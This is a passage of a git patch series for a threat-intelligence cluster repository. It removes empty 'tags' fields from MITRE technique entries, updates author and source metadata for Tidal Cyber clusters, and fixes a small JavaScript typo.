@@ -2501,8 +2466,7 @@ "platforms": [ "Containers" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -2521,8 +2485,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -2597,8 +2560,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -2705,8 +2667,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -2836,8 +2797,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -2882,8 +2842,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -2932,8 +2891,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -2961,8 +2919,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -2982,8 +2939,7 @@ "Office 365", "SaaS" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3030,8 +2986,7 @@ "platforms": [ "Network" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3107,8 +3062,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3140,8 +3094,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3160,8 +3113,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3180,8 +3132,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3245,8 +3196,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3322,8 +3272,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3385,8 +3334,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3413,8 +3361,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3433,8 +3380,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3488,8 +3434,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3516,8 +3461,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3534,8 +3478,7 @@ "platforms": [ "Containers" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3616,8 +3559,7 @@ "platforms": [ "PRE" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3652,8 +3594,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3670,8 +3611,7 @@ "platforms": [ "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3721,8 +3661,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3786,8 +3725,7 @@ "Azure AD", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3816,8 +3754,7 @@ "platforms": [ "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3837,8 +3774,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3902,8 +3838,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -3981,8 +3916,7 @@ "Office 365", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -4043,8 +3977,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -4137,8 +4070,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -4173,8 +4105,7 @@ "Linux", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -4236,8 +4167,7 @@ "platforms": [ "PRE" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -4575,8 +4505,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -4678,8 +4607,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -4752,8 +4680,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -4784,8 +4711,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -4819,8 +4745,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -4858,8 +4783,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -4945,8 +4869,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -4981,8 +4904,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -5002,8 +4924,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -5024,8 +4945,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -5045,8 +4965,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -5065,8 +4984,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -5088,8 +5006,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -5109,8 +5026,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -5133,8 +5049,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -5154,8 +5069,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -5204,8 +5118,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -5235,8 +5148,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -5256,8 +5168,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -5274,8 +5185,7 @@ "platforms": [ "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -5329,8 +5239,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -5415,8 +5324,7 @@ "platforms": [ "PRE" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -5494,8 +5402,7 @@ "platforms": [ "PRE" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -5614,8 +5521,7 @@ "platforms": [ "PRE" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -5716,8 +5622,7 @@ "platforms": [ "PRE" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -5750,8 +5655,7 @@ "platforms": [ "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -5770,8 +5674,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -5956,8 +5859,7 @@ "Office 365", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -6296,8 +6198,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -6541,8 +6442,7 @@ "Office 365", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -6608,8 +6508,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -6627,8 +6526,7 @@ "Containers", "IaaS" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -6786,8 +6684,7 @@ "Office 365", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -6840,8 +6737,7 @@ "platforms": [ "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -6860,8 +6756,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -6883,8 +6778,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -6980,8 +6874,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -7023,8 +6916,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -7088,8 +6980,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -7120,8 +7011,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -7141,8 +7031,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -7297,8 +7186,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -7543,8 +7431,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -7676,8 +7563,7 @@ "platforms": [ "IaaS" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -7714,8 +7600,7 @@ "platforms": [ "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -7762,8 +7647,7 @@ "platforms": [ "Network" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -7790,8 +7674,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -7815,8 +7698,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -7835,8 +7717,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -7855,8 +7736,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -7888,8 +7768,7 @@ "platforms": [ "Network" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -7948,8 +7827,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -7979,8 +7857,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -7999,8 +7876,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -8021,8 +7897,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -8046,8 +7921,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -8066,8 +7940,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -8266,8 +8139,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -8422,8 +8294,7 @@ "platforms": [ "PRE" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -8555,8 +8426,7 @@ "Office 365", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -8719,8 +8589,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -8773,8 +8642,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -8793,8 +8661,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -8864,8 +8731,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -8959,8 +8825,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -9053,8 +8918,7 @@ "platforms": [ "PRE" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -9087,8 +8951,7 @@ "platforms": [ "macOS" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -9108,8 +8971,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -9224,8 +9086,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -9269,8 +9130,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -9517,8 +9377,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -9589,8 +9448,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -9670,8 +9528,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -9704,8 +9561,7 @@ "platforms": [ "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -9724,8 +9580,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -9744,8 +9599,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -9885,8 +9739,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -9967,8 +9820,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -9996,8 +9848,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -10014,8 +9865,7 @@ "platforms": [ "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -10040,8 +9890,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -10058,8 +9907,7 @@ "platforms": [ "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -10078,8 +9926,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -10214,8 +10061,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -10262,8 +10108,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -10282,8 +10127,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -10330,8 +10174,7 @@ "platforms": [ "PRE" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -10431,8 +10274,7 @@ "platforms": [ "PRE" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -10514,8 +10356,7 @@ "platforms": [ "PRE" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -10544,8 +10385,7 @@ "platforms": [ "PRE" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -10564,8 +10404,7 @@ "Office 365", "SaaS" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -10660,8 +10499,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -10700,8 +10538,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -10720,8 +10557,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -10741,8 +10577,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -10785,8 +10620,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -10897,8 +10731,7 @@ "platforms": [ "PRE" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -10943,8 +10776,7 @@ "Office 365", "SaaS" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -10964,8 +10796,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -11044,8 +10875,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -11083,8 +10913,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -11193,8 +11022,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -11282,8 +11110,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -11509,8 +11336,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -11583,8 +11409,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -11619,8 +11444,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -11674,8 +11498,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -11704,8 +11527,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -11725,8 +11547,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -11758,8 +11579,7 @@ "platforms": [ "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -11782,8 +11602,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -11832,8 +11651,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -11861,8 +11679,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -11880,8 +11697,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -11902,8 +11718,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -11920,8 +11735,7 @@ "platforms": [ "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -11987,8 +11801,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -12021,8 +11834,7 @@ "platforms": [ "IaaS" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -12054,8 +11866,7 @@ "platforms": [ "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -12081,8 +11892,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -12228,8 +12038,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -12278,8 +12087,7 @@ "platforms": [ "IaaS" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -12377,8 +12185,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -12464,8 +12271,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -12611,8 +12417,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -12659,8 +12464,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -12736,8 +12540,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -12800,8 +12603,7 @@ "platforms": [ "Network" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -12873,8 +12675,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -12903,8 +12704,7 @@ "platforms": [ "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -12921,8 +12721,7 @@ "platforms": [ "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { diff --git a/tools/tidal-api/models/cluster.py b/tools/tidal-api/models/cluster.py index c6703fd..1877d04 100644 --- a/tools/tidal-api/models/cluster.py +++ b/tools/tidal-api/models/cluster.py @@ -99,7 +99,7 @@ class ClusterValue: def return_value(self): value_dict = asdict(self) value_dict["meta"] = { - k: v for k, v in asdict(self.meta).items() if v is not None + k: v for k, v in asdict(self.meta).items() if v is not None and v != [] } return value_dict From f756c18d1d4e0c3645ec68c75c079ed32a40895f Mon Sep 17 00:00:00 2001 From: niclas Date: Tue, 5 Mar 2024 15:11:57 +0100 Subject: [PATCH 37/49] Fix [clusters] authors --- clusters/tidal-campaigns.json | 6 ++++-- clusters/tidal-groups.json | 6 ++++-- clusters/tidal-references.json | 6 ++++-- clusters/tidal-software.json | 6 ++++-- clusters/tidal-tactic.json | 6 ++++-- clusters/tidal-technique.json | 6 ++++-- tools/tidal-api/config/campaigns.json | 6 ++++-- tools/tidal-api/config/groups.json | 6 ++++-- tools/tidal-api/config/references.json | 6 ++++-- tools/tidal-api/config/software.json | 6 ++++-- tools/tidal-api/config/tactic.json | 6 ++++-- tools/tidal-api/config/technique.json | 6 ++++-- 12 files changed, 48 insertions(+), 24 deletions(-) diff --git a/clusters/tidal-campaigns.json b/clusters/tidal-campaigns.json index 9bf6ae3..ba36260 100644 --- a/clusters/tidal-campaigns.json +++ b/clusters/tidal-campaigns.json @@ -1,9 +1,11 @@ { - "authors": "Tidal", + "authors": [ + "Tidal Cyber" + ], "category": "Campaigns", "description": "Tidal Campaigns Cluster", "name": "Tidal Campaigns", - "source": "Tidal", + "source": "https://app-api.tidalcyber.com/api/v1/campaigns/", "type": "campaigns", "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", "values": [ diff --git a/clusters/tidal-groups.json b/clusters/tidal-groups.json index a288078..53185a4 100644 --- a/clusters/tidal-groups.json +++ b/clusters/tidal-groups.json @@ -1,9 +1,11 @@ { - "authors": "Tidal", + "authors": [ + "Tidal Cyber" + ], "category": "Threat Groups", "description": "Tidal Threat Groups Cluster", "name": "Tidal Threat Groups", - "source": "Tidal", + "source": "https://app-api.tidalcyber.com/api/v1/groups/", "type": "groups", "uuid": "41c3e5c0-de5c-4edb-b48b-48cd8e7519e6", "values": [ diff --git a/clusters/tidal-references.json b/clusters/tidal-references.json index eaa2bc8..e084937 100644 --- a/clusters/tidal-references.json +++ b/clusters/tidal-references.json @@ -1,9 +1,11 @@ { - "authors": "Tidal", + "authors": [ + "Tidal Cyber" + ], "category": "References", "description": "Tidal References Cluster", "name": "Tidal References", - "source": "Tidal", + "source": "https://app-api.tidalcyber.com/api/v1/references/", "type": "references", "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", "values": [ diff --git a/clusters/tidal-software.json b/clusters/tidal-software.json index d0fac83..6cf642b 100644 --- a/clusters/tidal-software.json +++ b/clusters/tidal-software.json @@ -1,9 +1,11 @@ { - "authors": "Tidal", + "authors": [ + "Tidal Cyber" + ], "category": "Software", "description": "Tidal Software Cluster", "name": "Tidal Software", - "source": "Tidal", + "source": "https://app-api.tidalcyber.com/api/v1/software/", "type": "software", "uuid": "38d62d8b-4c49-489a-9bc4-8e294c4f04f7", "values": [ diff --git a/clusters/tidal-tactic.json b/clusters/tidal-tactic.json index 4db9606..aaf9e9b 100644 --- a/clusters/tidal-tactic.json +++ b/clusters/tidal-tactic.json @@ -1,9 +1,11 @@ { - "authors": "Tidal", + "authors": [ + "Tidal Cyber" + ], "category": "Tactic", "description": "Tidal Tactic Cluster", "name": "Tidal Tactic", - "source": "Tidal", + "source": "https://app-api.tidalcyber.com/api/v1/tactic/", "type": "tactic", "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", "values": [ diff --git a/clusters/tidal-technique.json b/clusters/tidal-technique.json index 0fde8d2..f7e47b4 100644 --- a/clusters/tidal-technique.json +++ b/clusters/tidal-technique.json @@ -1,9 +1,11 @@ { - "authors": "Tidal", + "authors": [ + "Tidal Cyber" + ], "category": "Technique", "description": "Tidal Technique Cluster", "name": "Tidal Technique", - "source": "Tidal", + "source": "https://app-api.tidalcyber.com/api/v1/technique/", "type": "technique", "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", "values": [ diff --git a/tools/tidal-api/config/campaigns.json b/tools/tidal-api/config/campaigns.json index 8d28b19..408476e 100644 --- a/tools/tidal-api/config/campaigns.json +++ b/tools/tidal-api/config/campaigns.json @@ -8,11 +8,13 @@ "icon": "bullhorn" }, "cluster": { - "authors": "Tidal", + "authors": [ + "Tidal Cyber" + ], "category": "Campaigns", "description": "Tidal Campaigns Cluster", "name": "Tidal Campaigns", - "source": "Tidal", + "source": "https://app-api.tidalcyber.com/api/v1/campaigns/", "type": "campaigns" } } \ No newline at end of file diff --git a/tools/tidal-api/config/groups.json b/tools/tidal-api/config/groups.json index 8d89867..14419ee 100644 --- a/tools/tidal-api/config/groups.json +++ b/tools/tidal-api/config/groups.json @@ -8,11 +8,13 @@ "icon": "user-secret" }, "cluster": { - "authors": "Tidal", + "authors": [ + "Tidal Cyber" + ], "category": "Threat Groups", "description": "Tidal Threat Groups Cluster", "name": "Tidal Threat Groups", - "source": "Tidal", + "source": "https://app-api.tidalcyber.com/api/v1/groups/", "type": "groups" } } \ No newline at end of file diff --git a/tools/tidal-api/config/references.json b/tools/tidal-api/config/references.json index ad42ae4..037b034 100644 --- a/tools/tidal-api/config/references.json +++ b/tools/tidal-api/config/references.json @@ -8,11 +8,13 @@ "icon": "list" }, "cluster": { - "authors": "Tidal", + "authors": [ + "Tidal Cyber" + ], "category": "References", "description": "Tidal References Cluster", "name": "Tidal References", - "source": "Tidal", + "source": "https://app-api.tidalcyber.com/api/v1/references/", "type": "references" } } \ No newline at end of file diff --git a/tools/tidal-api/config/software.json b/tools/tidal-api/config/software.json index 328bc32..f2070dd 100644 --- a/tools/tidal-api/config/software.json +++ b/tools/tidal-api/config/software.json @@ -8,11 +8,13 @@ "icon": "file-code" }, "cluster": { - "authors": "Tidal", + "authors": [ + "Tidal Cyber" + ], "category": "Software", "description": "Tidal Software Cluster", "name": "Tidal Software", - "source": "Tidal", + "source": "https://app-api.tidalcyber.com/api/v1/software/", "type": "software" } } \ No newline at end of file diff --git a/tools/tidal-api/config/tactic.json b/tools/tidal-api/config/tactic.json index 0027c39..d2a845d 100644 --- a/tools/tidal-api/config/tactic.json +++ b/tools/tidal-api/config/tactic.json @@ -8,11 +8,13 @@ "icon": "map" }, "cluster": { - "authors": "Tidal", + "authors": [ + "Tidal Cyber" + ], "category": "Tactic", "description": "Tidal Tactic Cluster", "name": "Tidal Tactic", - "source": "Tidal", + "source": "https://app-api.tidalcyber.com/api/v1/tactic/", "type": "tactic" } } \ No newline at end of file diff --git a/tools/tidal-api/config/technique.json b/tools/tidal-api/config/technique.json index 674c656..debdda0 100644 --- a/tools/tidal-api/config/technique.json +++ b/tools/tidal-api/config/technique.json @@ -8,11 +8,13 @@ "icon": "user-ninja" }, "cluster": { - "authors": "Tidal", + "authors": [ + "Tidal Cyber" + ], "category": "Technique", "description": "Tidal Technique Cluster", "name": "Tidal Technique", - "source": "Tidal", + "source": "https://app-api.tidalcyber.com/api/v1/technique/", "type": "technique" } } \ No newline at end of file From 050f367c686fdfead68984c6ac7db9a1dd169cc8 Mon Sep 17 00:00:00 2001 From: niclas Date: Tue, 5 Mar 2024 15:14:36 +0100 Subject: [PATCH 38/49] Fix [graph] typo --- tools/mkdocs/site/docs/01_attachements/javascripts/graph.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js index 48fc3c3..9e33ba6 100644 --- a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js +++ b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js @@ -9,7 +9,7 @@ document$.subscribe(function () { var valuesToSelect = ['1', '2', '3']; tf.setFilterValue(4, valuesToSelect); tf.filter(); - }; + } function parseFilteredTable(tf, allData) { var data = []; From b2cc4ccd0866440c348016210f77b9fe5373db2a Mon Sep 17 00:00:00 2001 From: niclas Date: Tue, 